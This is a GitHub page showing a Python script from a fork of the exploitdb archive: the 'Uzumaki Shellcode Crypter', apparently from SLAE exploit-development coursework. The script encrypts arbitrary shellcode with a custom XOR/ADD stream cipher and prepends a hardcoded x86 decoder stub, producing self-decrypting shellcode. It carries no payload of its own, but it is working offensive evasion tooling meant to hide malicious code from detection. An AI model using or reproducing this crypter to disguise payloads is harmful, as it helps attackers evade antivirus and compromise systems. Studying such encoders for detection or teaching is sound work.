forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy path43741.py
More file actions
executable file
·154 lines (119 loc) · 4.61 KB
/
Copy path43741.py
File metadata and controls
executable file
·154 lines (119 loc) · 4.61 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Uzumaki Shellcode Crypter - Python Language
# Copyright (C) 2013 Geyslan G. Bem, Hacking bits
#
# http://hackingbits.com
# geyslan@gmail.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
uzumaki_crypter
* uses the uzumaki cipher, a custom stream cipher algorithm ( (XOR [static] and XOR [pseudorandom]), ADD [static] )
# ./uzumaki_crypter.py -h
# ./uzumaki_crypter.py -a 03 -x f2 -s $'\x31\xc9\xf7\xe1...\x80'
'''
import sys
import getopt
import string
def usage ():
usage = """
-a --add Byte to be used with bitwise ADD (one byte in hex format)
Default is 01
Eg. -a 2f
--add 1f
-x --xor Byte to be used with bitwise XOR (one byte in hex format)
Default is cc
Eg. -x f2
--xor aa
-s --shellcode The shellcode to be crypted with the uzumaki cipher
Eg. -s $'\\xcd\\x80'
--shellcode `printf "\\xcc\\x90"`
-h --help This help
"""
print(usage)
def main():
addByte = "01"
xorByte = "cc"
shellcode = ""
try:
opts, args = getopt.getopt(sys.argv[1:], "ha:x:s:")
except getopt.GetoptError as err:
print(err)
usage()
sys.exit()
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-a", "--add"):
if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
print(" ADD byte has to be in hex format. Eg. -a 3f\n")
sys.exit()
addByte = a
elif o in ("-x", "--xor"):
if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
print(" XOR byte has to be in hex format. Eg. -x f1\n")
sys.exit()
xorByte = a
elif o in ("-s", "--shellcode"):
shellcode = a.encode("utf_8", "surrogateescape")
if (not shellcode):
print(" Is necessary to inform a shellcode. Eg. -s $'\\xcd\\x80'\n")
sys.exit()
crypted = ""
crypted2 = ""
crypted3 = ""
crypted4 = ""
tempbyte = 0x00
for x in range(len(shellcode)):
if (x == 0):
tempbyte = shellcode[x]
else:
tempbyte = ((shellcode[x-1] ^ (shellcode[x] ^ int("0x" + xorByte, 16) )) + int("0x" + addByte, 16))
if (tempbyte > 0xff or tempbyte <= 0x00):
print(" A crypted byte value cannot be higher than 0xff or equal to 0x00. Please change the value of the option 'ADD' or/and of the option 'XOR'.\n")
sys.exit()
crypted += "\\x%02x" % tempbyte
crypted2 = crypted.replace("\\x", ",0x")[1:]
crypted3 += r"\x29\xc9\x74\x14\x5e\xb1"
crypted3 += r"\x%02x" % (len(shellcode) - 1)
crypted3 += r"\x46\x8b\x06\x83\xe8"
crypted3 += r"\x" + addByte
crypted3 += r"\x34"
crypted3 += r"\x" + xorByte
crypted3 += r"\x32\x46\xff\x88\x06\xe2\xf1\xeb\x05\xe8\xe7\xff\xff\xff"
crypted3 += crypted
crypted4 = crypted3.replace("\\x", ",0x")[1:]
crypted = '"' + crypted + '";'
crypted3 = '"'+ crypted3 + '";'
print("Uzumaki Shellcode Crypter - Swirling Everything")
print("http://hackingbits.com")
print("https://github.com/geyslan/SLAE.git")
print("License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n\n")
print("Crypted shellcode:\n")
print(crypted)
print()
print(crypted2)
print("\n\n")
print("Crypted shellcode with decrypter built-in:\n")
print(crypted3)
print()
print(crypted4)
print("\n\n")
print("Length: %d" % len(bytearray(shellcode)))
print("Length with decrypter: %d" % ((len(crypted3) - 2) / 4))
if __name__ == "__main__":
main()